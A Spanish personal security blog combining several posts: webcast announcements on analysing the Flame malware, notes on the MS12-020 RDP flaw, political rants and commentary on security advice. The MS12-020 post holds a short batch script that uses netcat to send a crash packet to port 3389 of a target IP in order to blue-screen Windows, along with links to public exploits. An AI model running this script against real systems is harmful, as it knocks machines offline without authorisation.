Webcast sobre Flame o {ponga-amenaza-aquí} para administradores IT

Estándar

Hola a tod@s!

Después de todo lo que se ha hablado del infame FLAME, poco de momento se puede hablar más, hasta que no salgan nuevos hallazgos sobre el tema. Lo que si es un hecho es que parece que este Malware ha sido el nexo de unión entre piques de soluciones Antimalware. Por un lado tenemos el post que publicó Mikko de F-Secure, en el que explícitamente nombra la amenaza de FLAME como una especie de LAMERADA con la originalidad de un “matón de colegio”.

Kaspersky, por su parte, no ha entrado en la pelea, y sigue deleitándonos con muy buenos artículos centrados en sus investigaciones sobre la supuesta amenaza (Que es lo importante), la cual, poco a poco, se nos va desvelando.

Por la parte de Bit9, han decidido realizar un Webcast (Ya terminado), en el que hacen conciencia sobre lo vulnerables que podemos ser ante este tipo de amenazas.  Son ellos también, los que han realizado un reporte “light” sobre FLAME, explicando en líneas generales (y comerciales) en qué consiste esta amenaza de tipo APT.

Yo por mi parte no voy a entrar a valorar si la metodología de ataque es buena o mala, si el código utilizado incorpora librerías no nativas del sistema, lo que convierte al Malware en un “gordito”, o si se basa en código de “otros”. Eso se lo dejo a los verdaderos profesionales del tema. Por otro lado, y puestos a ser un poco mamoncete podríamos decir que…

Mucho lamer, malware gordito y lento, pero nadie ha sido capaz de detectarlo en 4 años jaja

Desde Microsoft han reservado dos Webcast para hablar sobre amenazas de tipo persistentes (APT) que se puedan presentar y coexistir en una arquitectura Microsoft. Y me han pedido que si podía dar estas dos sesiones y aportar mi humilde opinión.

Como no quería entrar en debates sobre este tipo de amenazas, si son peligrosas o no, me he decantado por intentar aportar una visión más “administrativa” e intentar dar respuesta a ese colectivo tan olvidado de la mano de Dios… Los sufridos Administradores de Sistemas.

Así que estos dos Webcast , vayan dedicados a estos profesionales como la copa de un pino, que en multitud de ocasiones tienen que aguantar a todo un colectivo de personas con multitud de problemas…. Aclamando que el suyo es “el más importante”…

El primer Webcast irá dirigido al análisis de un Malware a través de las herramientas de SysInternals, así como otras herramientas menos conocidas, pero igual de interesantes y útiles. Todo el desarrollo de este Webcast, se complementará con demostraciones prácticas con este Malware, así que podréis ver, cómodamente desde vuestro curro, casa, bar, playa, etc..,  cómo utilizar herramientas nativas de Spectra para realizar esta primera valoración en un análisis dinámico de Malware.

El segundo Webcast va dirigido a descubrir, haciendo uso de la arquitectura existente, y con la información anterior, si la amenaza se ha extendido a otros equipos de la organización. Para ello hablaremos de Active Directory, PowerShell y por qué no…. De BATCH!! (Lorenzo no te lo pierdas!! :P)

Tanto en el primer Webcast como en el segundo, comentaré y referenciaré la ingente cantidad de buenos post redactados por compañeros de profesión como son Sergio de los Santos, Yago, Luis Delgado, Marc Rivero (Seifreed), el Maligno, etc…

Así que aprovecho también desde aquí para felicitarlos a todos ellos por tan buena información, así como el trabajo de redactarlo y publicarlo para todos. Sin estos artículos y sin la ayuda de alguno (Gracias Seifreed!) el trabajo de comprensión y adaptación me hubiese tomado el doble o triple de tiempo.

Webcast. Análisis de Flame con SysInternals (04 de Julio 16:00 horas)

En este Webcast daremos una primera visión de cómo administradores de sistemas e investigadores de seguridad, se pueden enfrentar a amenazas de tipo persistente (Advanced Persistent Threat), utilizando para ello las herramientas de Microsoft SysInternals.

Para la primera sesión, se utilizará como demostración la reciente aparición de un Malware que ha dado mucho que hablar dentro de la comunidad de seguridad, así como en equipos de gobierno y fuerzas de seguridad: el Malware FLAME.

Con la información obtenida en esta primera sesión, se podrá comprobar como los analistas de sistemas, así como administradores de seguridad, pueden utilizar estos datos para mitigar la amenaza utilizando para ello una arquitectura basada en Microsoft.

https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032518505&Culture=es-ES&community=0

Webcast. ¿Amenazas a mí? Sácale partido a tu arquitectura (05 de Julio 16:00 horas)

A través de la información recogida y analizada en el Webcast anterior (Análisis de Flame con Sysinternals), se procederá a mitigar una posible amenaza, utilizando para ello la propia infraestructura Microsoft que posea un cliente específico. A lo largo de la sesión, se dará una visión global y ejemplos específicos como por ejemplo Active Directory o PowerShell.

https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032518510&Culture=es-ES&community=0

Para teminar este post, y haciendo alusión a la palabra LAMER, utilizada para referenciar una amenaza, termino con unas palabras que me dijo un Administrador de Sistemas: “Una amenaza, por pobre que sea, es dañina por la propia definición de la palabra amenaza. No hay que olvidar que nosotros nos debemos a nuestros usuarios”.

Os espero la semana que viene!

Salu2 a tod@s!!

Algunas notas sobre el exploit MS12-020

Estándar

Hola a tod@s!

Llevo unos 3 días informándome sobre la vulnerabilidad que afecta a todos los servicios de Terminal Server, y he aquí la información que puedo aportar al respecto de leer y releer scripts e información adicional.

Después de leer en mi RSS post similares con información relativa a exploits públicos, los cuales revelaban que habían conseguido ejecutar código remoto , me puse a buscar dichos exploits.

El único que he encontrado, a simple vista parece que lanza una shellcode escuchando en el puerto 4444 de la posible “víctima”. Nada más lejos de la realidad.

Estuve como 45 minutos de mi triste vida intentando buscar algún port de RDP en python sin éxito. Así que estuve leyendo cosas relacionadas con el proyecto FreeRDP, para al final, confirmarse la sospecha de que el script que se encuentra publicado en Pastebin es un puto fake como una catedral, y que me costó cerca de una hora de mi vida.

Imagen 1.- FAKE como una catedral

El siguiente script que probé,  es el ya archiconocido exploit chino, el cual lleva código robado de un partner de Microsoft. En un principio se habló de una filtración en ZDI, pero Microsoft ha acabado confirmando que se ha tratado de una filtración a través de uno de sus partners.

Este exploit funciona a la perfección, pero sólo en Windows 7. He probado en un Windows XP SP3 en Spanish, y no causa ningún efecto en el sistema, salvo que éste consume todos los recursos a nivel de CPU, permaneciendo al 100% en la ejecución del exploit.

Imagen 2.- 100 % CPU exploit ms12-020

Como he comentado antes, en Windows 7 y Windows Server 2008 funciona a la perfección, pero es posible mitigar en parte este ataque, configurando el equipo para que sólo permita la autenticación basada en NLA (Network Level Authentication). Cuando configuramos esta opción, a la hora de negociar una conexión RDP contra un Server 2K8 o un Wiindows Vista/7, se obliga a autenticarse primero al cliente, antes de que el equipo que hace las veces de servidor establezca una sesión completa RDP. Esta configuración, mitigaría cualquier ataque de denegación de servicio de forma automatizada, debido a la no disponibilidad de usuario y password. En el caso de que se conozca un usuario y password de RDP, se podría seguir explotando el fallo, y automatizándolo con scripts.

Sin duda alguna, el que me ha funcionado a la perfección tanto en Windows XP como en Windows 7, ha sido el paquete de demostración que ha publicado el descubridor del fallo Luigi Auriemma. El paquete de demostración lo tiene publicado en el advisory ampliamente comentado en otros blogs y foros de internet, y funciona perfectamente.

En el propio Advisory, Luigi explica que en algunas ocasiones, se hace necesario realizar varias veces el envío del paquete malicioso para que Windows suelte un bonito BSOD, así que dicho y hecho! Como hay publicados ya muchos exploits en Python, Ruby, C y demás lenguajes, yo para probar mis sistemas he decidido realizar un cutre script en BATCH (Con dos cojones ;-)) haciendo llamadas a netcat para que realice un envío del paquete malicioso.

Probando en Windows XP y Windows 7 con el paquete mágico, con sólo el envío de 4 paquetes los dos sistemas pintan un bonito BSOD. El cutre código (Of course) aquí:

 @echo off
 echo .
 echo ##################################################################################
 echo # MS12-020 cutre script BSOD Exploit
 echo # Juan Garrido https://windowstips.wordpress.com
 echo # Tested on XPSP3 And Windows 7 32 bits
 echo # Windows 7 With NLA (NetWork Level Authentication) not Working
 echo # See more http://technet.microsoft.com/en-us/security/bulletin/ms12-020
 echo ##################################################################################
 if "%1"=="" GOTO msg
 set _IP=%1
 set _Netcat=nc.exe %_IP% 3389 ^< termdd_1.dat
 :RUN
 FOR /L %%i IN (1,1,5) DO %_Netcat%
 GOTO end
 :msg
 echo ERROR: Specify a hostname or IP address.
 echo i.e. %0 HOSTNAME
 goto end
 :end
 pause
 

Salu2 a tod@s!

 

Referencias

https://github.com/FreeRDP/FreeRDP

http://pastebin.com/fFWkezQH (FAKE como una catedral)

http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx

http://pastebin.com/jzQxvnpj (Exploit funcional Windows 7)

http://technet.microsoft.com/en-us/library/cc732713.aspx (Network Level Authentication)

http://aluigi.org/adv/termdd_1-adv.txt (Advisory explicando la vulnerabilidad MS12-020)

Mentiras, y gordas…

Estándar

Hola a tod@s!

Estaba leyendo el periódico, la gaceta, el 20 minutos y demás publicaciones, como cada día hago en la oficina, de 9:00 a 13:00 eso sí, y como buen “security researcher”, cuando leo la siguiente noticia…

González Sinde gastó 56.404 euros del Ministerio de Cultura en un proyector para la Familia Real

Y digo… Coño, vaya pastizal que se han gastao en el proyector de los cojones! Las porno se tendrán que ver de puta madre no?

En fin, después de meditar durante un buen rato sobre cómo sería ver una porno en un aparato de tales dimensiones y capacidad técnica, estuve footprinteando un poco a ver si podía buscar más info. Y me encuentro con lo siguiente:

Coño que es verdad!

Que se han gastao la pasta en un proyector para los príncipes y mi hermano en paro!

Acto seguido, empecé a pensar sobre el país en que vivimos y en qué clase política nos “dirige”… A lo único que llegó mi perturbada mente es a pensar en improperios varios que ni yo mismo conocía….. Cuando pienso…. CUANTO COSTARÁ EL BICHO ESTE EN EBAY??

Imagen 1.- El bicho…. NUEVO

Link al bicho

Estoooo…. Recapitulemos…..

42.000 pavos de diferencia???? WFT??

Así que se me ocurren varias opciones…..

Opción 1.- Que cinematografía pereira son unos caros de TRES PARES DE COJONES

Opción 2.- Que traer un BICHO de estas características cueste en aranceles e impuestos varios 42.000 pavos menos el beneficio que tendrá que sacar la pobre Cinematografía Pereira

Opción 3.- Que la señora ministra SINDE, a la cual le doy un afectuoso saludo desde aquí, utilice esa diferencia para arreglar los posibles fallos que pueda tener la Web de los premios GOYI.

Opción 4.- Que se hayan equivocado, lo cual dudo mucho, ya que la película Mentiras y Gordas, ideada y guionizada por nuestra querida EX-Ministra Sinde, se otorgase ella misma (cuñao!!), una adjudicación en “ayudas”, por valor de 1 kilotón de euretes….

Cualquier día me compro una guitarra, y me voy a conocer mundo….

Pero qué coño….. Ya tengo una guitarra!!

Salu2!!

Trabajal?

Estándar

Hola a tod@s!

Vaya puente de mierda que me he pasado…. El Viernes, después de una semana dura de trabajo, me disponía a ir a Madrid vía Tenerife en avión. El plan era llegar de noche, acostarme, levantarme el Sábado sobre las 6 AM e irme para Triana a pasar un merecido puente…. FAIL….

Los controladores se piran a media tarde, yo con las maletas facturadas y allí nadie tenía ni puta idea de nada. Una azafata de Iberia, al ver la avalancha de gente gritando y corriendo hacia ella, se pone a llorar, y acto seguido, una pelea de dos tipos que decían que habían llegado primero. La papeleta no podía pintar peor….

3 días…. 3 días allí tirado y la gente que no tenía ni idea de qué pasaba. Los ánimos se crispaban, y el odio crecía… Hacia los controladores. Al parecer el gobierno ha dicho que los controladores ganan una pasta, que los convenios hay que cambiarlos, etc, etc…

Yo, como ser humano que soy, me cago en todo el primer día, y me cago en la madre que parió a todos los controladores del mundo mundial… Pero bueno, ya me conocéis un poco… Digo, coño, si es Viernes y estás solterón chavalín!! Vete de copas por la Latina!!

Al día siguiente, con un buen resacón en lo alto ;-), y teniendo que estar allí porque Iberia había cancelado todos los vuelos, me dispongo a alquilarme una habitación de hotel. Como no tenía nada que hacer, pues me puse a footprintear un poco por la Red, mirando opiniones y contrastando hechos.

DISCLAIMER

Esta opinión es mía y sólo mía. Ni tengo parientes controladores ni conozco a ninguno. Cierto es que me gustaría conocer a una controladora guapa ya que busco novia formal, pero no la conozco (todavía).

A continuación voy a intentar relatar, lo que yo pienso que es un TimeLine de los hechos de estos días, ya que estoy en modo Conspiracy==ON. Vuelvo a repetir que esta es mi opinión. Puede tener fallos o carecer de todo fundamento. Allá vamos!!

01 de Diciembre
Zapatero planta a la cumbre Iberoamericana para ultimar el plan anticrisis. Según él, no ha ido para “ahorrar”, ya que la cosa está mu mal….
http://www.elmundo.es/elmundo/2010/12/01/espana/1291215890.html

Al tanto de otra cosa, se piensa privatizar ciertos segmentos del país, ya que la cosa está que arde…. A recaudar pasta….Que no hay….
http://www.elconfidencial.com/espana/zapatero-privatizacion-aena-loterias-20101201-72171.html

03 de Diciembre
El Rey se pira, antes de la huelga….
http://www.elperiodico.com/es/noticias/internacional/20101203/rey-vuelve-cumbre-iberoamericana-por-primera-vez-desde-por-que-callas/608306.shtml

03 de Diciembre
El Gobierno aprueba la privatización de AENA y fija el máximo de horas a trabajar por un controlador, pero ellos, supuestamente, han superado ese límite, …
http://fly-news.es/aeropuertos/el-gobierno-aprueba-la-privatizacion-de-aena/

 03 de Diciembre
Se lia parda, y yo en medio….
http://www.20minutos.es/noticia/893825/0/cerrado/espacio/aereo/

El día siguiente, 4 de Diciembre, a pocas horas del plantazo de los controladores aéreos, sale en el BOE (Boletín Oficial del Estado) el documento que acredita el estado de “alarma”.

http://www.boe.es/boe/dias/2010/12/04-2/pdfs/BOE-A-2010-18683.pdf

Como podréis observar, lo firma el Rey en Argentina y el Ministro de la Presidencia, Ramón Jaúregui. Pero la firma de  “El Presi”, la veis??…

Según el Gobierno, los controladores ganan más de 300.000 €.

http://www.google.com/hostednews/afp/article/ALeqM5ieSAlXtUI5DnmAwtHc357_MUeNbQ

Según mi percepción, y a la hora de mirar la TV y las noticias por prensa escrita, noto que el Gobierno está intentando introducir la idea de que este colectivo está muy muy bien pagado. Gracias a ello, pienso que aquí nace la mayor parte de odio a través de la gran mayoría de Españoles.

Debido a que supuestamente AENA está quebrada (No tengo ni puta idea de si es cierto o no), la Web Aviación digital Global, saca un documento explicando en la medida de lo posible el supuesto atropello a los controladores.

http://www.aviaciondigitalglobal.com/newsFiles/20100215043137-4.PDF

Primero el Gobierno dice que no sabía lo de la Huelga, después dice que sí. Lo extraño es que ningún político haya cogido un avión en este puente tan largo. Bueno, Rajoy lo hizo, pero como no está en el poder, pues no creo que tuviese mucha idea de nada….

http://www.europapress.es/economia/noticia-salgado-dice-indicios-posible-huelga-20101204094711.html

El caso es que si uno se va a la Web de la Unión Sindical de los Controladores Aéreos (USCA), se puede ver cómo ellos sí publican documentos de las paradas, debido al que sobrepasan el límite de horas legales.

https://www.usca.es/prensa/carpeta_notas_de_prensa/los-controladores-alertan-de-cierres-parciales-del-espacio-aereo-espanol/files/nota-de-prensa-18-11-2010.pdf

https://www.usca.es/prensa/carpeta_notas_de_prensa/esta-noche-no-hay-controladores-en-santiago-ya-que-todos-los-que-tienen-que-acudir-a-trabajar-han-cumplido-el-maximo-de-horas-que-permite-la-ley/files/nota-de-prensa-29-11-2010.pdf

Acto seguido, noticia en Aviación Digital Global que comenta que el Gobierno sabía 24 horas antes que se podía liar parda… Y los cabrones que no me dicen nada…. ;-(

http://www.aviaciondigitalglobal.com/noticia.asp?NotId=14950&NotDesignId=4

Y sobre los sueldos de los controladores…..

Imagen 1.- Nómina de Controlador

En fin, que no quiero ser conspiranoico, pero estaba aburrido este Sábado, pudiendo estar en mi Triana…..

Que conste que Tenerife me encanta!! Y sus Héntes!!

Owned memorable?

Estándar

Hola a tod@s!!

Me permito parafrasear el título de este post, con el título de los post a los que nos tiene acostumbrados el gran Alejandro Ramos en SecurityByDefault, para contaros lo siguiente.
Todos las personas que me conocen un poco, saben que soy un gran acérrimo y seguidor de todo lo que se haga a través de la Red. Me encanta Internet, y pienso que es una de las mejores herramientas inventadas por el ser humano, equiparable a lo que fue la rueda o el fuego en su época.
Hoy voy a escribir sobre el poder de Internet, o mejor dicho, sobre el poder de la herramienta a la hora de realizar determinados “actos”.
Está “el mundo real” preparado para ese poder? La gente de “a pie” conoce realmente el poder de esta herramienta? A veces pienso que si, y otras que no.
Me explico. Me encanta estar al día de lo que se cuece en internet en lo que a seguridad y tecnología se refiere, me figuro que como todos los lectores de este humilde blog. Pero, como a todos, también me gusta vagabundear por la Red, mirando vídeos y chorradas varias. Soy asiduo a foros de seguridad como Elhacker.net, wadalbertia o indetectables, y mi RSS está “petado” de Blogs. Pero también vagabundeo por youtube y mil páginas más que no tienen que ver nada o casi nada con el mundo de la seguridad. También me gusta estar al día de las noticias, y, para ello, leo asiduamente foros relacionados con la economía, blogs y Webs de varios periódicos, así como la televisión (Noticias). Gracias a ello, me puedo crear mi “propia película”, debido principalmente porque cada cadena, cada periódico y cada blog, te dice la noticia desde una perpectiva “política” diferente. Menos mal que gracias a los foros, uno se entera de cosas que la televisión y las Webs principales no te dirán, principalmente porque el que escribe en un periódico es periodista, y el que escribe en un foro es una persona de “a pie”. 
Estas últimas semanas he estado atento ante un acontecimiento que se avecinaba. Un Owned en toda regla, que incluso yo mismo pensaba que sería muy difícil realizarlo, pero que se ha plasmado como una realidad absoluta. Pero para contarlo con detalle, tengo que remontarme a unos años antes y contaros parte de la película.
Existen personas que, hartas de las mentiras que nos cuentan una y otra vez los medios de comunicación, intentan realizar, a veces con éxito y otras no, bromas de “mal gusto” que lleguen a los escalafones más altos de las cadenas y periódicos que cada día, con mucho amor, moldean nuestra mente.
En el 2008, se planeó una pequeña gamberrada en Internet de forma cuasi-secreta que llegase a los medios de comunicación. Esta pequeña gamberrada tenía como fin demostrar de forma tácita el “poco” rigor que existe en el periodismo a la hora de redactar noticias y relatar hechos. Así que se inventaron la historia de que un Ovni había sobrevolado España. Y cómo resolvieron la “gamberrada”? De una forma muy sencilla, pero fuertemente efectiva.
Consiguieron reunir usuarios de todas partes de España, como Andalucía, Castilla la Mancha, País Vasco, Barcelona, etc… Otros usuarios se encargaron de la logística, consiguiendo mails y teléfonos de todas las cadenas y periódicos de tirada nacional, y, un día, se pusieron de acuerdo:

  • Usuarios de Barcelona llaman a una hora determinada a todas las cadenas de TV y periódicos: “Hemos visto un Ovni sobrevolando Barcelona”
  • Usuarios de Barcelona realizan un mailing masivo a todas las cadenas de TV y periódicos diciendo lo mismo.
  • Usuarios del País Vasco realizan la misma operación media hora después.
    Usuarios de Castilla la Mancha realizan la misma operación media hora después de las realizadas desde el País Vasco.
  • Usuarios de Andalucía realizan la misma operación una hora después de las realizadas desde Castilla la Mancha.

322822mapa-avistaciones

Imagen 1. Logística del avistamiento

Todo perfectamente organizado. Ahora a esperar….

Un tiempo (Varias horas) después se empieza a notar “el cambio”:

http://www.20minutos.es/noticia/369109/0/luces/espana/ovnis (Owned)

[Youtube=http://www.youtube.com/watch?v=f03SwMye8BI]

Vídeo Está Pasando Tele 5 (Owned)

http://blogs.elcorreo.com/magonia/2008/4/16/-20-minutos-telecinco-y-los-40-principales-se-tragan-una/3 (No Owned)

La broma quedó ahí, en una simple broma. Pero lo de este año ha sido “glorioso”.
Este año han ido un pelín más allá, y han ido a por todas. El fin era realizar un Owned en horario de máximo Share por una cadena de televisión. Tenían un candidato, TVE, y un concurso que Ownear. EUROVISION.
Eurovisión ha sido una de esas galas que ha ido perdiendo con el tiempo. Todavía me acuerdo cuando era pequeño, y nos sentábamos todos los hermanos a ver “la gala” con toda la familia. Era España coño! Teníamos que ganar! Todos sabíamos que no era fútbol pero joder, teníamos que quedar bien en Europa! Pero poco a poco se fue degradando hasta que “la gala” ha perdido prácticamente todo su encanto. Incluso programas de TV como la Sexta, llegaron a poner a Chikilicuatre entre las filas de “triunfitos”, haciendo gala de un poder de convocatoria magnífico y bien utilizado para llegar a ese fin. 

chikilicuatre

Imagen 2.- Chikilicuatre!

 
Si el año pasado fue “divertido”, este año, el plantel era grotesco. Entre la karmele marchante y otras perlas, el concurso no podía ser más dantesco. Las cadenas de televisión creían que iba a ser como el año pasado. Ponemos a uno de nosotros, y tenemos publicidad gratis para mucho tiempo. Si a la Sexta le funcionó, por qué no a nosotros?. El principal problema es que no contaban con el poder de convocatoria de Internet. Gracias a que se ha podido votar a través de la Red, lo único que tenían que hacer es poner a un candidato (A ser posible problemático), y votar a través de este medio. Mientras más usuarios mejor posicionado lo pondremos. El caso es que llegue a la primera convocatoria. Que llegue a la Gala.
Candidatos había muchos, pero se quedaron con uno. John Cobra.
Cadenas de TV, al ver cómo usuarios de Internet estaban intentando la misma jugada que ellos, no dudaron ni un segundo en tachar de “pardillo” a este personaje, sin mucho éxito…
[Youtube=http://www.youtube.com/watch?v=s_oA0i0RLWA]

Este personaje, conocido en Internet a través de innumerables vídeos y apariciones “estelares”, fue elegido por estos usuarios. Estos chicos le comentaron la jugada, y le dijeron que podían llevarle a lo más alto, sin necesidad de patrocinios por parte de empresas ni nada por el estilo. Sólo con el poder de convocatoria. El aceptó y creó una canción. La canción…. No comment….

[Youtube=http://www.youtube.com/watch?v=fornq8tPduk]

Acto seguido se realizó un llamamiento a todo usuario de Internet pidiendo votos para este “personaje”. Incluso pusieron Video-Ejemplos de cómo votar por la canción para ganar posicionamientos.

[Youtube=http://www.youtube.com/watch?v=T-jZgplhCGo]

Incluso yo mismo voté en la convocatoria, pensando en que iba a ser prácticamente imposible que este personaje llegase siquiera a salir en la gala.
El caso es que se posicionó y se posicionó…. Y llegó. Y vaya si llegó…..

[Youtube=http://www.youtube.com/watch?v=lIMqV6cclKY]

Yo no sé ustedes, pero yo me he estado partiendo el culo durante un buen rato….. La noticia no se ha hecho esperar, y ha conseguido su fin. Un owned en toda regla a una cadena de TV, y noticias en primera página en todos los periódicos de tirada nacional.

http://www.elmundo.es/elmundo/2010/02/22/television/1266879013.html

http://www.elpais.com/articulo/gente/Actuacion/vergonzosa/John/Cobra/gala/finalistas/Eurovision/elpepugen/20100223elpepuage_1/Tes

http://www.abc.es/20100223/gente-tv-radio-programacion/john-cobra-comedmela-maricones-201002230205.html

La verdadera cuestión que se avecina es la siguiente: Se toma en serio el poder de convocatoria, convicción y ataque de Internet? De todos es sabido que incluso partidos políticos contratan a gente para “comentar” en blogs y en Webs comentarios partidistas para ganar adeptos. El problema es cuando un grupo más o menos organizado, utiliza este poder de convocatoria y ataque para cosas malignas. Uno de los más conocidos son el grupo de 4chan, el cual, “de vez en cuando”, da la nota con algunas gamberradas.

http://thenextweb.com/2009/08/22/facebook-4chan-hack-christians-email-accounts-social-network-profiles/

http://alt1040.com/2009/07/se-avecina-guerra-att-bloquea-parte-de-4chanorg

En fin… Hoy me he reído un buen rato, pero, y mañana? Me seguiré riendo?….
Saludos a tod@s!!

Referencias

Los avistamientos Ovnis y la Prensa

John Cobra apoyado por Forocoches

http://www.johncobra.tv/blog/

Seguridad en aplicaciones Web. El caso de Julián Moreno

Estándar

Hola a tod@s!

He de confesar que me ha encantado. Cómo condensar N horas sobre formación en seguridad en aplicaciones Web? Contando una historia!!

Pues eso es lo que me he encontrado al leer el blog de Gonzalo Álvarez Marañón.

Gonzalo asistió  como ponente en la II Jornada STIC CCN-CERT. Su charla se basó en explicar de una manera clara y concisa todo lo relacionado con los ataques Web. Ya sabéis, SQL injection, XSS, Phishing, manipulación de parámetros, etc, etc.. En 30 minutos!!

Y es que el pájaro este es un crack. Se inventa un personaje (Julián Moreno), una historia con tintes verídicos (Ventas por Internet), y un contrato con una consultora (Creación de tienda virtual). Y se monta una historia chulísima! Con permiso de Gonzalo, me voy a tomar la libertad de poner aquí la presentación, ya que me ha encantado. Me encantan las historias!

Por otra parte, me comenta Gonzalo que alguien grabó el evento, el cual está colgado en YouTube en 8 bonitas partes. 

Os recomiendo que la veáis. A mi, personalmente me ha encantado.

En otro orden de cosas, tengo cuasiterminado un post dedicado al blog de Gonzalo, el cual tengo que decir, me está ayudando muchísimo en mis labores de “presentador”. Me he visto reflejado en varios de sus post, y me he reido bastante de mi mismo al darme cuenta de esos fallos de “concepto” que cometo a dar alguna charla. Así que ya os hablaré de él dentro de poco.

Chapó Gonzalo y gracias por tus historias!

Referencias:

http://elartedepresentar.com/2008/11/28/no-muestres-datos-cuenta-historias/

http://elartedepresentar.com/2008/12/04/el-video-de-seguridad-en-aplicaciones-web/

http://www.iec.csic.es/~gonzalo/

FamilyBlogs=FamilyBlogs+1

Estándar

Bueno, bueno…. Ya era hora de actualizar esto.

Parece que tengo un claro en el camino, así que lo voy a aprovechar para terminar de escribir varios post que tengo subidos, pero no terminados. Ya hay gente que me ha dado un tirón de orejas por no escribir todo lo que debería. También me han comentado que parece ser que Internet ha dado un bajón considerable de audiencia, debido principalmente a que he dejado de escribir. Como no quiero que la audiencia de Internet se vaya a otro medio más informado que éste, como puede ser… no sé… La TV?, reconozco públicamente mi responsabilidad para con este blog e Internet, y a partir de ahora escribiré con mucha más regularidad. Yo, mi, me, conmigo… ;-)

Después de estas interesantísimas palabras, vengo a comentaros algo que para mi fue una grata sorpresa en cuanto lo supe.

Mi colega Pedro, que este año tuve el placer de conocer. De hecho, una de mis primeras palabras con él fue en una charla de análisis de Logs. Estuvimos jugando con LogParser + BBDD en Access para la recolección, a lo que uno preguntó, Y esta opción para qué es? Yo, anonadado, dije: Pues no tengo ni !@## idea! Pedro, raudo como el viento, no sólo dijo para qué servía, sino que además me “regaló” unas estadísticas preciosas que se podían hacer con la herramienta.

Este pájaro, curra en la Asociación Técnica de Cajas de Ahorros, y da gusto escucharle cuando se pone a hablar de análisis forense y Phishing. Dentro de poco, si Dios quiere, liberará una tool muy chula, pero eso dejaremos que nos lo cuente él, ya que me ha prometido que escribirá un post sobre ello, el cual colgaré en el blog.

Si ya me tenía contento con la Tool, la cual tuve el placer y gozo de ver en directo manejada por él, me encuentro con otra grata sorpresa, y es que ha comenzado otra etapa de Bloguero. El blog en cuestión se llama ConexiónInversa, y en él, se tratan temas muy interesantes. Temas relacionados con Malware, Phishing, y como no, Análisis Forense. Un gustazo de lectura!! Y en ezpañó!!

Así que sin más dilación, os dejo con la lectura de este Blog. Y, de nuevo, bienvenido a la FamilyBlogs!

Saludos a tod@s!

Ahora sí hablamos de Windows 7

Estándar

Como siempre, cada vez que una compañía saca un nuevo sistema operativo, otro equipo empieza  una labor nueva, que es la de innovar el nuevo sistema operativo, para en un futuro sacar una versión posterior.

Pasa con casi todo el Software del mercado. Y es bueno para muchas cosas. Empleo, innovación, arte, etc…

Con Spectra no iba a ser menos, y el ciclo de vida de muchos productos se acaba, y el de otros empieza. Tenemos a Windows XP, que empezó allá en el año 2001, y que el soporte extendido se le acaba en el 2014, con lo que todavía le queda una parcelita en el podium de los Sistemas Operativos. Más de 13 años de soporte. Eso es tiempo para plantearse una migración!

http://support.microsoft.com/lifecycle/?p1=3223

Con Windows Vista pasa algo parecido, empezando el ciclo de vida en el año 2007, y retirando el soporte extendido en el año 2017, si la cosa no cambia.

http://support.microsoft.com/lifecycle/?p1=11737

Los Service Packs también tienen su roadmap, pero la fecha de lanzamiento puede diferir dependiendo de muchos factores, como que haya que asegurar la compatibilidad, estabilidad y seguridad, elementos que se han cuidado mucho en estos últimos años.

http://www.microsoft.com/windows/lifecycle/servicepacks.mspx

Todo esto es para una serie de sistemas operativos, pero, qué pasa con la nueva generación? La que se está gestando?

Pues no tengo ni puta idea, pero me figuro que empezarán lanzándose bulos, como todos los que hemos escuchado hasta ahora. Que si Windows7 esto, que si Windows7 lo otro, que si sale el año que viene, etc… Pero desde Spectra, nada de nada. Algún que otro vídeo del Surface y poco más.

Así que dos de los ingenieros de Spectra responsables de Windows7, Jon DeVaan y Steven Sinovski, han creado un blog llamado E7, abreviaturas de Engineering Windows7.

http://blogs.msdn.com/e7/

Ahora sí, especulaciones aparte, se puede hablar de Windows7

Saludos!

Otro más…

Estándar

Hola a tod@s!!

Ya llegan las cervecitas en la terracita, la playita, estara hasta tarde en la calle con el fresquito, y las niñas wapas!!

Pero también llegan otras cositas, otras cositas que dan mucho que pensar a locos como yo. Como sabréis, se ha puesto muy de moda esto de los decálogos de seguridad. Un “gurú” de la seguridad, desea implantar su “decálogo” de seguridad en equipos Windows. Porque claro, tienen que ser 10 por cojones. No 9  ni 90, sino 10. Porque yo lo valgo….

La “investigación” la tenéis aquí. Como podréis observar, se ha realizado de forma exhaustiva, con rigor absoluto, consultada por expertos en la materia, y cotejada bajo la atenta mirada de fieles usuarios a…. Spectra…

Hay cosas tan interesantes como esta…

Analizar con uno o dos antivirus actualizados TODO archivo que provenga del exterior

Y ahora digo yo… Si TODAS las casas de Antivirus desaconsejan el uso de más de un antivirus en el sistema operativo… No sé, quizás porque se reservan memoria para ejecutar de forma controlada algunos archivos, o porque instalan drivers que operan a nivel de Kernel, o porque incluso pueden encontrar en el “adversario” una acción como un ataque directo al sistema (por ejemplo la instalación del driver)…. No sé, es bueno para el sistema operativo? No mermaría la PRODUCTIVIDAD??

Creo que Virustotal no está haciendo una buena labor de Márketing… Sergio!! Díles a esta gente quiénes sois!!

También hay cositas tan interesantes como….

Navegadores: no usar Internet Explorer. Los demás navegadores no son la panacea de la seguridad, pero al menos no son vía de entrada de adware y spyware. En todo caso, es recomendable navegar con los scripts desactivados, salvo en aquellas webs en que sean imprescindibles. Hay herramientas que ayudan a facilitar esta tarea, como la extensión “No Script” de Firefox.

Yo sé que Pedrito aquí me va a matar pero lo tengo que decir….

Quién dice que IE es la puerta de entrada para Malware y Adware? Acaso no sabéis, queridos hamijos, que existe una cosita llamada servicio de ActiveX en Vista? Acaso no sabéis controlar las ZONAS SEGURAS de Internet Explorer? Las políticas de seguridad os suenan de algo? No sé, pero por si acaso, os pongo la guía de seguridad de IE7.

http://www.microsoft.com/downloads/details.aspx?FamilyID=6AA4C1DA-6021-468E-A8CF-AF4AFE4C84B2&displaylang=en

Y esta perla, me encanta….

Seguridad inalámbrica: si no se quiere compartir la conexión adrede, es imprescindible el cifrado WPA con una buena contraseña. El filtro MAC complementa esta medida.

Los chicos de SeguridadWireless seguro que se están descojonando…. Oye… Y digo yo… Y si sniffo la red y me cambio la MAC?

Pero le falta algo…. No sé, hay algo que falla en todo esto… me explico….

Si aplicamos TODOS estos puntitos con el mismo rigor que fue escrito… Yo (Y cualquier usuario) podría…

a) Instalarme el Emule y compartir todo mi disco raíz

b) Parar los N antivirus que tuviese

c) Descrifrar el disco duro

d) Quitar todas las políticas de IE

e) Cambiarme la MAC por esta que está más guapa DE:FE:CA:DE:FE:CA

f) Instalarme un Sniffer

